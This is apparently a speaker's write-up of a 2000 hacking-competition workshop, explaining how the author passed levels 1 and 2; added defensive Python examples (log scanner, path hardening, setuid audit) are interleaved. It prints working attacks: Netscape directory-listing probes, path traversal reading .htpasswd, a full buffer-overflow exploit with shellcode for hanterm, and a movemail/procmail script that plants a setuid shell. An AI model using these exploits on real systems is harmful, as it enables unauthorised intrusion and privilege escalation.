OlymFair Workshop Hacking technique


1st OlymFair Workshop
Hacking technique
Taeho Oh
http://postech.edu/~ohhara
Contents
• How to pass level 1
• How to pass level 2
• Why did many hackers consume much time in level 2?
• About level 3
• Conclusion
How to pass level 1 (1)
• What to do?
– Execute /cgi-bin/data/idaccess.cgi and get the
way to go to level 2
How to pass level 1 (2)
• Level 1 servers
– 203.227.243.161
– 203.227.243.162
– 203.227.243.163
How to pass level 1 (3)
• 203.227.243.161
– OS : Solaris 8
– Opened TCP port : 80, 8080
How to pass level 1 (4)
• 203.227.243.162
– OS : HPUX 11.0
– Opened TCP port : 22, 80, 8080
How to pass level 1 (5)
• 203.227.243.163
– OS : MS Windows 2000
– Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135,
139, 443, 1025, 1026, 1032, 1723, 3389
How to pass level 1 (6)
• Attack 203.227.243.161
– 80 : Apache Web Server
– 8080 : Netscape Enterprise Server
• The web servers on 80 and 8080 share the same httpd
home directory
• Netscape Enterprise Server has a security bug
How to pass level 1 (7)
• Netscape Enterprise Server security bug
– I could see the files in a specific directory, like
below
• http://203.227.243.161/?wp-cs-dump
– You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
– I could browse the directories and check whether files
existed
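Added here as a defender's example, not part of the original presentation: a small Python scanner that reads Common Log Format access-log lines and flags requests whose query string carries one of the Netscape wp-* tags listed above. The log lines are constructed; the first mirrors the probe URL used against 203.227.243.161.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Netscape Enterprise Server "web publishing" tags used as directory-indexing /
# version-info probes. Hyphens are ignored when matching so that misspelled
# variants such as ?wpstop-ver are caught as well.
WP_TAGS = {"wp-cs-dump", "wp-ver-info", "wp-html-rend", "wp-usr-prop", "wp-ver-diff",
           "wp-verify-link", "wp-start-ver", "wp-stop-ver", "wp-uncheckout"}
_NORMALIZED = {t.replace("-", "") for t in WP_TAGS}

# Common Log Format: host ident authuser [date] "method url proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

def wp_tags_in(url):
    """Return the wp-* tags present as query keys of a request URL."""
    keys = (k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return sorted(k for k in keys if k.lower().replace("-", "") in _NORMALIZED)

def scan_log(lines):
    """Return one hit dict per CLF line whose URL carries a wp-* probe tag."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue            # not a CLF line; skip rather than crash
        client, ts, _method, url, status, _size = m.groups()
        tags = wp_tags_in(url)
        if tags:
            hits.append({"client": client, "time": ts, "url": url,
                         "status": int(status), "tags": tags})
    return hits

# Constructed sample log (not taken from the page); the first line mirrors the
# ?wp-cs-dump probe described above, the last two are benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jun/2000:13:40:01 +0900] "GET /?wp-cs-dump HTTP/1.0" 200 1834
10.0.0.5 - - [30/Jun/2000:13:40:09 +0900] "GET /cgi-bin/?wp-ver-info HTTP/1.0" 200 512
10.0.0.9 - - [30/Jun/2000:13:41:00 +0900] "GET /index.html HTTP/1.0" 200 2048
10.0.0.5 - - [30/Jun/2000:13:42:15 +0900] "GET /data/idaccess.html?id=x HTTP/1.0" 401 0
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['url']} -> {','.join(hit['tags'])}")
```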
How to pass level 1 (8)
• The file list
/                      Can’t access this directory
+----- cgi-bin/
|      +----- data/
|      +----- hackme/
|             +----- a
|             +----- a.c
|             +----- show_file.html
|             +----- showfile.cgi
+----- data/
+----- index.html
How to pass level 1 (9)
• Read .htaccess file with showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess
• Read .htpasswd file (named in .htaccess) with showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd
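showfile.cgi opened whatever absolute path arrived in NAME, which is why .htaccess and .htpasswd were readable. As an added example (not the competition's CGI), a Python replacement for the path handling: the request name is resolved under a document root, traversal and symlinks are collapsed before the containment check, dotfiles are refused, and only regular files are served. The document root layout is constructed in a temporary directory and mirrors the tree above.

```python
import tempfile
from pathlib import Path

class Forbidden(Exception):
    """Raised when a NAME parameter must not be served."""

def resolve_under_root(docroot, name):
    """Map a user-supplied NAME to a file that is guaranteed to lie inside docroot."""
    root = Path(docroot).resolve()
    if "\x00" in name or name.startswith(("/", "\\")):
        raise Forbidden("absolute path or NUL byte")
    candidate = (root / name).resolve()          # collapses ../ and follows symlinks
    if root not in candidate.parents:            # also rejects docroot itself
        raise Forbidden("outside document root")
    if any(p.startswith(".") for p in candidate.relative_to(root).parts):
        raise Forbidden("dotfile such as .htaccess or .htpasswd")
    if not candidate.is_file():
        raise Forbidden("not a regular file")
    return candidate

def show_file(docroot, name):
    """Hardened stand-in for showfile.cgi?NAME=...: return the file's text."""
    return resolve_under_root(docroot, name).read_text()

def refused(docroot, name):
    """True if the hardened check rejects NAME (handy for tests and logging)."""
    try:
        resolve_under_root(docroot, name)
        return False
    except Forbidden:
        return True

def build_demo_docroot():
    """Constructed layout mirroring the page's file list (not the real server)."""
    root = Path(tempfile.mkdtemp())
    (root / "cgi-bin" / "hackme").mkdir(parents=True)
    (root / "cgi-bin" / "data").mkdir()
    (root / "cgi-bin" / "hackme" / "show_file.html").write_text("<html>ok</html>")
    (root / "cgi-bin" / "data" / ".htpasswd").write_text("admin:FAKEHASH")  # constructed
    return root

if __name__ == "__main__":
    root = build_demo_docroot()
    print(show_file(root, "cgi-bin/hackme/show_file.html"))
    for bad in ("/cgi-bin/data/.htpasswd", "cgi-bin/hackme/../data/.htpasswd",
                "../../etc/passwd"):
        print(f"{bad}: {'refused' if refused(root, bad) else 'SERVED'}")
```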
How to pass level 1 (10)
• I could crack the encrypted password
from .htpasswd with Crack
– id:password = admin:banana
– I could access /cgi-bin/data directory with this
id and password
How to pass level 1 (11)
• I could get the way to go to level 2
– http://203.227.243.161/data/idaccess.html
• This page is the form that executes
http://203.227.243.161/cgi-bin/data/idaccess.cgi
– My serial number
• KOR000321-961829513
– My password
• oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
How to pass level 1 (12)
• Netscape Enterprise Server directory
indexing vulnerability
– See http://www.securityfocus.com/vdb/bottom.html?vid=1063
How to pass level 1 (13)
• Netscape Enterprise Server directory
indexing vulnerability patch information
The Directory Indexing feature can be turned off via the
Administration Interface. Selecting Content Management ->
Document Preferences and changing Directory Indexing to
"none" will disable this feature.
Also, manually editing the file obj.conf will do the same.
Conduct a search for the following:
Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
and replace fn="index-common" with fn="send-error".
How to pass level 2 (1)
• What to do?
– Execute /home/forbidden/pass.cgi
• This executable file's owner is root
• This executable file's group is wizard
• The permission is 0510
• Need wizard gid to execute /home/forbidden/pass.cgi
How to pass level 2 (2)
• Level 2 server
– 203.227.243.164
• 203.227.243.164
– OS : Linux
– Opened TCP port : 23, 81
How to pass level 2 (3)
• Wizard setuid or setgid files
-r-sr-xr-x  1 wizard wizard  26309 Jan  4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x  1 wizard wizard  47692 Mar 29  1999 /sbin/dump
-rwsr-xr-x  1 wizard wizard  10708 Apr 20  1999 /sbin/cardctl
-rws--x--x  1 wizard wizard   6148 May 15  1999 /usr/X11R6/bin/Xwrapper
-rws--x--x  1 wizard wizard 158180 May 14  1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x  1 wizard wizard  33120 Mar 22  1999 /usr/bin/at
-rwsr-xr-x  1 wizard wizard   3208 Mar 23  1999 /usr/bin/disable-paste
-r-sr-x---  1 wizard wizard  42652 Aug 31  1999 /usr/bin/inndstart
-r-sr-x---  1 wizard wizard  40060 Aug 31  1999 /usr/bin/startinnfeed
-r-sr-sr-x  1 wizard wizard  15816 Jan  7 07:41 /usr/bin/lpq
-r-sr-sr-x  1 wizard wizard  15608 Jan  7 07:41 /usr/bin/lpr
-r-sr-sr-x  1 wizard wizard  16248 Jan  7 07:41 /usr/bin/lprm
How to pass level 2 (4)
• Wizard setuid or setgid files ( Cont. )
-rws--x--x  2 wizard wizard 517916 Apr  7  1999 /usr/bin/suidperl
-rws--x--x  2 wizard wizard 517916 Apr  7  1999 /usr/bin/sperl5.00503
-rwsr-sr-x  1 wizard wizard  64468 Apr  7  1999 /usr/bin/procmail
-rwsr-xr-x  1 wizard wizard  14036 Apr 16  1999 /usr/bin/rcp
-rwsr-xr-x  1 wizard wizard  10516 Apr 16  1999 /usr/bin/rlogin
-rwsr-xr-x  1 wizard wizard   7780 Apr 16  1999 /usr/bin/rsh
-rwxr-sr-x  1 wizard wizard  17832 May 14  1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x  1 wizard wizard 299364 Apr 20  1999 /usr/sbin/sendmail
-rwsr-xr-x  1 wizard wizard  16488 Mar 23  1999 /usr/sbin/traceroute
-rwsr-xr-x  1 wizard wizard  18040 Jan  8 05:24 /usr/sbin/userhelper
-rwxr-sr-x  1 wizard wizard   3860 Apr 20  1999 /sbin/netreport
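The listing above is the same inventory an administrator should produce on a schedule, so that a setgid copy of a helper like movemail or an unexpected setuid binary stands out. As an added example that is not part of the presentation, a Python audit that walks a tree, collects setuid/setgid regular files and diffs them against a recorded baseline; the tree and baseline are constructed in a temporary directory.

```python
import os
import stat
import tempfile

def find_setid_files(root):
    """Return {path: (permission bits, uid, gid)} for every setuid/setgid
    regular file under root. Symlinks and special files are skipped."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # vanished or unreadable; keep going
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[path] = (stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return found

def diff_baseline(found, baseline):
    """Split the current inventory into paths absent from the baseline and
    paths whose mode/owner/group differ from what the baseline recorded."""
    unexpected = sorted(p for p in found if p not in baseline)
    changed = sorted(p for p in found if p in baseline and found[p] != baseline[p])
    return unexpected, changed

def build_demo_tree():
    """Constructed tree (not the level 2 host): one setuid, one setgid, one plain file."""
    root = tempfile.mkdtemp()
    for name, mode in (("dump", 0o4755), ("movemail", 0o2755), ("plain", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root

def audit_demo():
    """Run the audit with a baseline that only knows /dump; returns basenames of
    (all setid files, unexpected ones, changed ones)."""
    root = build_demo_tree()
    found = find_setid_files(root)
    baseline = {p: v for p, v in found.items() if p.endswith(os.sep + "dump")}
    unexpected, changed = diff_baseline(found, baseline)
    names = lambda paths: sorted(os.path.basename(p) for p in paths)
    return names(found), names(unexpected), names(changed)

if __name__ == "__main__":
    print(audit_demo())
```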
How to pass level 2 (5)
• Attack process
Get level2 shell → Get wizard euid → Get wizard uid
→ Create wizard uid, gid file → Get wizard gid → Execute pass.cgi
How to pass level 2 (6)
• level2 shell → wizard euid
– Exploit hanterm bug
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no name!@level2 ... ]$
How to pass level 2 (7)
• level2 shell → wizard euid (Cont.)
– This is a classic buffer overflow bug
– I could get a wizard euid shell with a 260-byte buffer
size and a -450 offset
How to pass level 2 (8)
• Exploit code
#include<stdio.h>
#include<stdlib.h>
#include<string.h>   /* strlen */
#include<unistd.h>   /* execl */
#define OFFSET -450
#define RET_POSITION 260
#define RANGE 20
#define NOP 0x90
char shellcode[1024]=
"\xeb\x1f"              /* jmp 0x1f */
"\x5e"                  /* popl %esi */
"\x89\x76\x08"          /* movl %esi,0x8(%esi) */
How to pass level 2 (9)
• Exploit code (Cont.)
"\x31\xc0"              /* xorl %eax,%eax */
"\x88\x46\x07"          /* movb %eax,0x7(%esi) */
"\x89\x46\x0c"          /* movl %eax,0xc(%esi) */
"\xb0\x0b"              /* movb $0xb,%al */
"\x89\xf3"              /* movl %esi,%ebx */
"\x8d\x4e\x08"          /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"          /* leal 0xc(%esi),%edx */
"\xcd\x80"              /* int $0x80 */
"\x31\xdb"              /* xorl %ebx,%ebx */
"\x89\xd8"              /* movl %ebx,%eax */
How to pass level 2 (10)
• Exploit code (Cont.)
"\x40"                  /* inc %eax */
"\xcd\x80"              /* int $0x80 */
"\xe8\xdc\xff\xff\xff"  /* call -0x24 */
"/bin/sh";              /* .string "/bin/sh" */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");   /* return value is left in %eax */
}
void main(int argc,char **argv)
{
How to pass level 2 (11)
• Exploit code (Cont.)
    char buff[RET_POSITION+RANGE+1],*ptr;
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;
    if(argc>1)
        offset=atoi(argv[1]);     /* optional offset override from argv */
    sp=get_sp();
    addr=sp-offset;               /* guessed return address */
    ptr=buff;
How to pass level 2 (12)
• Exploit code (Cont.)
    addr_ptr=(long*)ptr;
    for(i=0;i<bsize;i+=4)         /* fill the buffer with the guessed address */
        *(addr_ptr++)=addr;
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;              /* NOP sled in front of the shellcode */
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    buff[bsize-1]='\0';
How to pass level 2 (13)
• Exploit code (Cont.)
    execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,(char *)0);
}
How to pass level 2 (14)
• wizard euid → wizard uid
[I have no name!@level2 ... ]$ cat > a.c
main(){
setreuid(501,501);
execl("/bin/sh","sh",0);
}
[I have no name!@level2 ... ]$ gcc a.c ; ./a.out
[wizard@level2 ... ]$ whoami
wizard
[wizard@level2 ... ]$
How to pass level 2 (15)
• wizard uid → create wizard uid, gid file
– movemail is a wizard setgid program
• A file written by movemail gets wizard gid
[wizard@level2 ... ]$ echo haha > test1
[wizard@level2 ... ]$ movemail test1 test2
[wizard@level2 ... ]$ ls -l test1 test2
-rw-r--r--  1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r--  1 wizard wizard  5 Jul 10 02:03 test2
[wizard@level2 ... ]$ cat test2
haha
How to pass level 2 (16)
• wizard uid, gid file → wizard gid
– procmail executes an arbitrary shell command
with wizard uid and gid when the user can create
a file owned by wizard uid and gid (.procmailrc)
How to pass level 2 (17)
• Exploit code
#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",0);
}
EOF
How to pass level 2 (18)
• Exploit code (Cont.)
gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
How to pass level 2 (19)
• Exploit code (Cont.)
movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
How to pass level 2 (20)
• wizard gid → execute pass.cgi
Congratulation!!
You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege.And then
change the index.html under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3
Why did many hackers consume much time in level 2? (1)
• Almost all hackers tried to find a security bug
– However, level 2 could be cleared not with a bug
but with a feature (except for the hanterm bug)
Why did many hackers consume much time in level 2? (2)
• /sbin/dump has a buffer overflow bug, and no exploit
has been released
– Many hackers tried to exploit this program.
However, exploitation is impossible because the
main function does not return but calls exit, so the
overwritten return address is never used
Why did many hackers consume much time in level 2? (3)
• The /usr/bin/lprm exploit code produces a
segmentation fault message
– The segmentation fault message is not produced by
/usr/bin/lprm itself. It is produced by the exploit
code for /usr/bin/lprm; it is a bug in the exploit code.
About level 3
• I consumed much time, so I had no time to
attack level 3
• I tried to scan the level 3 server
– However, I couldn't find an open TCP port
– I didn't try to attack level 3 after that
• It seemed it would take much time
Conclusion
• It was an interesting hacking competition